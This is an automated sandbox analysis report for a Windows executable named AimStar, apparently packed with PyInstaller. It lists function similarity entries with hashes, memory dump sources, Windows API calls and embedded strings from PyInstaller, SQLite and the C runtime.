                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_7ff710f40000_AimStar.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: LongWindow$BlockCreateErrorLastReasonShutdown
                                                                                                                                                                                                                                          • String ID: Needs to remove its temporary files.
                                                                                                                                                                                                                                          • API String ID: 3975851968-2863640275
                                                                                                                                                                                                                                          • Opcode ID: 1b4b32be61da5f45784fe9fe2f7d724fb74bbaf2a32eb33803c40e4204126e7e
                                                                                                                                                                                                                                          • Instruction ID: 271f43225315fbb57902a094c190d750cbadc835227f0e016bd32e2443c5b9d7
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 1b4b32be61da5f45784fe9fe2f7d724fb74bbaf2a32eb33803c40e4204126e7e
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 5C21AB35B0CE4681E7416B7AA856579A358EF88BB0F884131DE2D833D5DE2CF5DAC320
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000002.00000002.2416933625.00007FF8A8151000.00000040.00000001.01000000.00000013.sdmp, Offset: 00007FF8A8150000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2416884251.00007FF8A8150000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2416933625.00007FF8A819A000.00000040.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2416933625.00007FF8A81A8000.00000040.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2416933625.00007FF8A81F7000.00000040.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2416933625.00007FF8A81FC000.00000040.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2416933625.00007FF8A81FF000.00000040.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2417270701.00007FF8A8200000.00000080.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2417319124.00007FF8A8202000.00000004.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_7ff8a8150000_AimStar.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_release_startup_lock
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 190073905-0
                                                                                                                                                                                                                                          • Opcode ID: bfa090c531bac24e46e178867b034455b2b04e74abd31691ae896f8f055f72f8
                                                                                                                                                                                                                                          • Instruction ID: 7fe109d555f43d2dc55cd6c1f509fc5236de704c0e8658cf71ad0e9a74aa9558
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: bfa090c531bac24e46e178867b034455b2b04e74abd31691ae896f8f055f72f8
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 4781E122E0E243B6FA6F9B65A4402796390EF867C0F486135E90C437A6DF7CE945C338
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000002.00000002.2416617324.00007FF710F41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF710F40000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2416566805.00007FF710F40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2416674508.00007FF710F6B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2416730985.00007FF710F7E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2416730985.00007FF710F81000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2416832282.00007FF710F84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_7ff710f40000_AimStar.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                                          • String ID: -$:$f$p$p
                                                                                                                                                                                                                                          • API String ID: 3215553584-2013873522
                                                                                                                                                                                                                                          • Opcode ID: 75ce3dd5e90789a751ac91fed3db50e3550f512a2f4dec46f6fb30c565ad9a60
                                                                                                                                                                                                                                          • Instruction ID: b5ba3284893052e7ff98e22cb206361e043a0247dd3356c3e385f86d6f71e249
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 75ce3dd5e90789a751ac91fed3db50e3550f512a2f4dec46f6fb30c565ad9a60
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 5A127066A0C94386FB207A14B156279B6B9FB48764FC44135E6A947BC4DF3CF688CB20
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000002.00000002.2416617324.00007FF710F41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF710F40000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2416566805.00007FF710F40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2416674508.00007FF710F6B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2416730985.00007FF710F7E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2416730985.00007FF710F81000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2416832282.00007FF710F84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_7ff710f40000_AimStar.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                                          • String ID: f$f$p$p$f
                                                                                                                                                                                                                                          • API String ID: 3215553584-1325933183
                                                                                                                                                                                                                                          • Opcode ID: efdc55b57c7b5823aa39a5abe82f144bbffe385c3037011f7a836833ec2ff017
                                                                                                                                                                                                                                          • Instruction ID: 8fcf5eb3ddbe455194ae058d66137542549d630644bbf7affd90912af0b487e5
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: efdc55b57c7b5823aa39a5abe82f144bbffe385c3037011f7a836833ec2ff017
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: AF12C322E0C94386FB20BA55E05667AF679FB40764FC84135E69947BC4DB7CF688CB20
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000002.00000002.2418977958.00007FF8A8751000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00007FF8A8750000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2418921147.00007FF8A8750000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2418977958.00007FF8A88B1000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2418977958.00007FF8A88B3000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2418977958.00007FF8A88C8000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2419321494.00007FF8A88CA000.00000080.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2419373768.00007FF8A88CC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_7ff8a8750000_AimStar.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: 00007C3010
                                                                                                                                                                                                                                          • String ID: %s %T already exists$sqlite_master$sqlite_temp_master$table$temporary table name must be unqualified$there is already an index named %s$view
                                                                                                                                                                                                                                          • API String ID: 2830847230-2846519077
                                                                                                                                                                                                                                          • Opcode ID: 3bafca03e1c0bf546381a32de105ce3aa4ad83823cff43ea0a1251520faa542c
                                                                                                                                                                                                                                          • Instruction ID: 5b43578b9e8744f82edb6174933a4d531302a9e4edca64802b9d87f58cd485e5
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 3bafca03e1c0bf546381a32de105ce3aa4ad83823cff43ea0a1251520faa542c
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 4D02D071A5A782AAEB14DF2194047B937A2FB85FC4F044235DE4E07795DF3CE9418728
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000002.00000002.2418977958.00007FF8A8751000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00007FF8A8750000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2418921147.00007FF8A8750000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2418977958.00007FF8A88B1000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2418977958.00007FF8A88B3000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2418977958.00007FF8A88C8000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2419321494.00007FF8A88CA000.00000080.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2419373768.00007FF8A88CC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_7ff8a8750000_AimStar.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: new[]
                                                                                                                                                                                                                                          • String ID: %s%c%s$:$:$?$\$winFullPathname1$winFullPathname2
                                                                                                                                                                                                                                          • API String ID: 4059295235-3840279414
                                                                                                                                                                                                                                          • Opcode ID: e46a12ec1441f981d07c3f2a607ca8bc3bdc7db8ee7e1141140c55af0bd5dc97
                                                                                                                                                                                                                                          • Instruction ID: 06e1857e9ded0d46aa837f112785f6dd9435810e2342a06deb213a1e8d0bfe5f
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: e46a12ec1441f981d07c3f2a607ca8bc3bdc7db8ee7e1141140c55af0bd5dc97
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 7351F521F8E38365FB199F65A8156BA6B91EF44BC8F484036DD4E13682DF3CE8458728
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000002.00000002.2416617324.00007FF710F41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF710F40000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2416566805.00007FF710F40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2416674508.00007FF710F6B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2416730985.00007FF710F7E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2416730985.00007FF710F81000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2416832282.00007FF710F84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_7ff710f40000_AimStar.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: CurrentProcess
                                                                                                                                                                                                                                          • String ID: Failed to extract %s: failed to allocate data buffer (%u bytes)!$Failed to extract %s: failed to open archive file!$Failed to extract %s: failed to read data chunk!$Failed to extract %s: failed to seek to the entry's data!$fread$fseek$malloc
                                                                                                                                                                                                                                          • API String ID: 2050909247-3659356012
                                                                                                                                                                                                                                          • Opcode ID: 0a0607520ca8377355c19b5082e51a1ab58991dfea364a4ef0faeab2849971ed
                                                                                                                                                                                                                                          • Instruction ID: 08dcf96e05720c10e5db8cf28e69652d89cfcbe5d6b1e84d60c8090fcd684549
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 0a0607520ca8377355c19b5082e51a1ab58991dfea364a4ef0faeab2849971ed
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: E6414025B0CA5241EA10FB15A8029B9E3ACBF84BE4FD44532EE0D47795DE3CF549C760
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • GetTempPathW.KERNEL32(?,?,00000000,00007FF710F43CBB), ref: 00007FF710F488F4
                                                                                                                                                                                                                                          • GetCurrentProcessId.KERNEL32(?,00000000,00007FF710F43CBB), ref: 00007FF710F488FA
                                                                                                                                                                                                                                          • CreateDirectoryW.KERNEL32(?,00000000,00007FF710F43CBB), ref: 00007FF710F4893C
                                                                                                                                                                                                                                            • Part of subcall function 00007FF710F48A20: GetEnvironmentVariableW.KERNEL32(00007FF710F4388E), ref: 00007FF710F48A57
                                                                                                                                                                                                                                            • Part of subcall function 00007FF710F48A20: ExpandEnvironmentStringsW.KERNEL32 ref: 00007FF710F48A79
                                                                                                                                                                                                                                            • Part of subcall function 00007FF710F582A8: _invalid_parameter_noinfo.LIBCMT ref: 00007FF710F582C1
                                                                                                                                                                                                                                            • Part of subcall function 00007FF710F42810: MessageBoxW.USER32 ref: 00007FF710F428EA
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000002.00000002.2416617324.00007FF710F41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF710F40000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2416566805.00007FF710F40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2416674508.00007FF710F6B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2416730985.00007FF710F7E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2416730985.00007FF710F81000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2416832282.00007FF710F84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_7ff710f40000_AimStar.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: Environment$CreateCurrentDirectoryExpandMessagePathProcessStringsTempVariable_invalid_parameter_noinfo
                                                                                                                                                                                                                                          • String ID: LOADER: failed to set the TMP environment variable.$LOADER: length of teporary directory path exceeds maximum path length!$TMP$TMP$_MEI%d
                                                                                                                                                                                                                                          • API String ID: 3563477958-1339014028
                                                                                                                                                                                                                                          • Opcode ID: e7f7d737786deb8485312a2eb98f4769331debcd6954f8bf1608d04e150fa3ce
                                                                                                                                                                                                                                          • Instruction ID: 91674fd2d4983c8932960ca1ba99b02b7a0d00544424844afb52f5cdf313c4c3
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: e7f7d737786deb8485312a2eb98f4769331debcd6954f8bf1608d04e150fa3ce
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: B0418021B1DE4250EA10BB26A8576BD93A8AF85BA4FC44031ED0D877D6DE3CF54EC320
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000002.00000002.2418977958.00007FF8A8751000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00007FF8A8750000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2418921147.00007FF8A8750000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2418977958.00007FF8A88B1000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2418977958.00007FF8A88B3000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2418977958.00007FF8A88C8000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2419321494.00007FF8A88CA000.00000080.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2419373768.00007FF8A88CC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_7ff8a8750000_AimStar.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: 00007C3010
                                                                                                                                                                                                                                          • String ID: %s at line %d of [%.10s]$8653b758870e6ef0c98d46b3ace27849054af85da891eb121e9aaa537f1e8355$API called with NULL prepared statement$API called with finalized prepared statement$ATTACH x AS %Q$misuse
                                                                                                                                                                                                                                          • API String ID: 2830847230-1404302391
                                                                                                                                                                                                                                          • Opcode ID: 5b54c79fbf9ef4df439d182e0c10d0aaa222cde74f4ab4cd2ef5e3f45b57d46a
                                                                                                                                                                                                                                          • Instruction ID: a22525a1263852934862ddda06361f238b11d05396f876c3c66042fa177f7184
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 5b54c79fbf9ef4df439d182e0c10d0aaa222cde74f4ab4cd2ef5e3f45b57d46a
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: DAF17C21B4FB86A6EAA49B65A45437973A5FF80BC0F144135CA5E077A5CF3CE845C328
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000002.00000002.2416617324.00007FF710F41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF710F40000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2416566805.00007FF710F40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2416674508.00007FF710F6B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2416730985.00007FF710F7E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2416730985.00007FF710F81000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2416832282.00007FF710F84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_7ff710f40000_AimStar.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
                                                                                                                                                                                                                                          • String ID: csm$csm$csm
                                                                                                                                                                                                                                          • API String ID: 849930591-393685449
                                                                                                                                                                                                                                          • Opcode ID: b3973e9ed2b821368333a922871466498bda8290f9160b5e7eff6497ccad0325
                                                                                                                                                                                                                                          • Instruction ID: ba9606a0720221f5dedbac9e2a35ca0a34bbd462ca31193e3ed612490fa84e28
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: b3973e9ed2b821368333a922871466498bda8290f9160b5e7eff6497ccad0325
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: EED18032A0CF4186EB20AF6594427ADB7A8FB557A8F900135EE4D97B95DF38F188C710
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • FreeLibrary.KERNEL32(?,?,?,00007FF710F5F11A,?,?,000002020A699808,00007FF710F5ADC3,?,?,?,00007FF710F5ACBA,?,?,?,00007FF710F55FAE), ref: 00007FF710F5EEFC
                                                                                                                                                                                                                                          • GetProcAddress.KERNEL32(?,?,?,00007FF710F5F11A,?,?,000002020A699808,00007FF710F5ADC3,?,?,?,00007FF710F5ACBA,?,?,?,00007FF710F55FAE), ref: 00007FF710F5EF08
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000002.00000002.2416617324.00007FF710F41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF710F40000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2416566805.00007FF710F40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2416674508.00007FF710F6B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2416730985.00007FF710F7E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2416730985.00007FF710F81000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2416832282.00007FF710F84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_7ff710f40000_AimStar.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: AddressFreeLibraryProc
                                                                                                                                                                                                                                          • String ID: api-ms-$ext-ms-
                                                                                                                                                                                                                                          • API String ID: 3013587201-537541572
                                                                                                                                                                                                                                          • Opcode ID: 2820b76ab0802fc58bac5aaef12ed6f6fffcf0c29b30edae647068643d5e49cf
                                                                                                                                                                                                                                          • Instruction ID: 3f9b8ab6d8581fe41d81464aef735dad918fc7068acf2bfcec1b14185e2e4dff
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 2820b76ab0802fc58bac5aaef12ed6f6fffcf0c29b30edae647068643d5e49cf
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 7C41E521B2DE0242EA19EF169806675A3A9BF49BB0FC98535ED1D87784DE3CF54DC320
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • GetCurrentProcessId.KERNEL32(?,?,?,?,?,?,?,?,00007FF710F43706,?,00007FF710F43804), ref: 00007FF710F42C9E
                                                                                                                                                                                                                                          • FormatMessageW.KERNEL32(?,?,?,?,?,?,?,?,00007FF710F43706,?,00007FF710F43804), ref: 00007FF710F42D63
                                                                                                                                                                                                                                          • MessageBoxW.USER32 ref: 00007FF710F42D99
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000002.00000002.2416617324.00007FF710F41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF710F40000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2416566805.00007FF710F40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2416674508.00007FF710F6B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2416730985.00007FF710F7E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2416730985.00007FF710F81000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2416832282.00007FF710F84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_7ff710f40000_AimStar.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: Message$CurrentFormatProcess
                                                                                                                                                                                                                                          • String ID: %ls: $<FormatMessageW failed.>$Error$[PYI-%d:ERROR]
                                                                                                                                                                                                                                          • API String ID: 3940978338-251083826
                                                                                                                                                                                                                                          • Opcode ID: 5cbcdbf458937bec5e084182eea0cc5ea1ed3b872b1d9e6a561cbd57b4752a27
                                                                                                                                                                                                                                          • Instruction ID: 216ef6fa3523ed6eff54554195cb6d0f90483de71eba51f70b48dfb83722ca6f
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 5cbcdbf458937bec5e084182eea0cc5ea1ed3b872b1d9e6a561cbd57b4752a27
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 5231E936B0CE4142E620BB15A8056AAB7A9BF847E8F810135EF4D93759DF3CE54EC310
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • 00007FF8BFAC3010.VCRUNTIME140(?,?,-8000000000000000,?,00000000,00007FF8A87CD120), ref: 00007FF8A878918D
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000002.00000002.2418977958.00007FF8A8751000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00007FF8A8750000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2418921147.00007FF8A8750000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2418977958.00007FF8A88B1000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2418977958.00007FF8A88B3000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2418977958.00007FF8A88C8000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2419321494.00007FF8A88CA000.00000080.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2419373768.00007FF8A88CC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_7ff8a8750000_AimStar.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: 00007C3010
                                                                                                                                                                                                                                          • String ID: %s at line %d of [%.10s]$8653b758870e6ef0c98d46b3ace27849054af85da891eb121e9aaa537f1e8355$API called with NULL prepared statement$API called with finalized prepared statement$misuse
                                                                                                                                                                                                                                          • API String ID: 2830847230-3538577999
                                                                                                                                                                                                                                          • Opcode ID: d25a55683a96beec84c6543246d2a53d95b184e2f538a83d7643ec1d3a9207f3
                                                                                                                                                                                                                                          • Instruction ID: 8dd77d91034763d3ac465e36e1c61142361fcc78712a713a6f0f399ff35f99a7
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: d25a55683a96beec84c6543246d2a53d95b184e2f538a83d7643ec1d3a9207f3
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 3E51AB22F8FA92A5FB549B5198143B86392EF81BD0F484131CE5D077C5DF3CE8828368
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • LoadLibraryExW.KERNEL32(?,?,?,00007FF710F4DFEA,?,?,?,00007FF710F4DCDC,?,?,?,00007FF710F4D8D9), ref: 00007FF710F4DDBD
                                                                                                                                                                                                                                          • GetLastError.KERNEL32(?,?,?,00007FF710F4DFEA,?,?,?,00007FF710F4DCDC,?,?,?,00007FF710F4D8D9), ref: 00007FF710F4DDCB
                                                                                                                                                                                                                                          • LoadLibraryExW.KERNEL32(?,?,?,00007FF710F4DFEA,?,?,?,00007FF710F4DCDC,?,?,?,00007FF710F4D8D9), ref: 00007FF710F4DDF5
                                                                                                                                                                                                                                          • FreeLibrary.KERNEL32(?,?,?,00007FF710F4DFEA,?,?,?,00007FF710F4DCDC,?,?,?,00007FF710F4D8D9), ref: 00007FF710F4DE63
                                                                                                                                                                                                                                          • GetProcAddress.KERNEL32(?,?,?,00007FF710F4DFEA,?,?,?,00007FF710F4DCDC,?,?,?,00007FF710F4D8D9), ref: 00007FF710F4DE6F
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000002.00000002.2416617324.00007FF710F41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF710F40000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2416566805.00007FF710F40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2416674508.00007FF710F6B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2416730985.00007FF710F7E000.00000004.00000001.01000000.00000003.sdmpDownload File
